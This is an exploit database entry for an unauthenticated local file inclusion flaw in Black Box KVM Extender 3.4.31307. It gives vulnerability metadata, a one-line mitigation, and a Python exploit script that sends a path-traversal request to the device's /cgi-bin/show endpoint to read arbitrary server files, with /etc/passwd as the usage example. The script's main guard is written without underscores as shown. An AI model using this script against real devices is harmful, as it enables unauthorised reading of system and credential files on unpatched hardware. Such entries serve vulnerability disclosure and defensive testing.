Black Box Kvm Extender 3.4.31307 - Local File Inclusion

vendor:

KVM Extender

by:

Ferhat Çil

9,8

CVSS

HIGH

Local File Inclusion

CWE

Product Name: KVM Extender

Affected Version From: 3.4.31307

Affected Version To: 3.4.31307

Patch Exists: NO

Related CWE: N/A

CPE: a:black_box:kvm_extender:3.4.31307

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2021

Black Box Kvm Extender 3.4.31307 – Local File Inclusion

Any user can read files from the server without authentication due to an existing LFI in the following path: http://target//cgi-bin/show?page=FilePath. The exploit can be used by passing the URL and the file path as arguments to the script.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Source

Exploit-DB raw data:

# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion
# Date: 05.07.2021
# Exploit Author: Ferhat Çil
# Vendor Homepage: http://www.blackbox.com/
# Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm
# Version: 3.4.31307
# Category: Webapps
# Tested on: Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target//cgi-bin/show?page=FilePath

import requests
import sys

if name == 'main':
    if len(sys.argv) == 3:
        url = sys.argv[1]
        payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2]
        r = requests.get(payload)
        print(r.text)
    else:
        print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')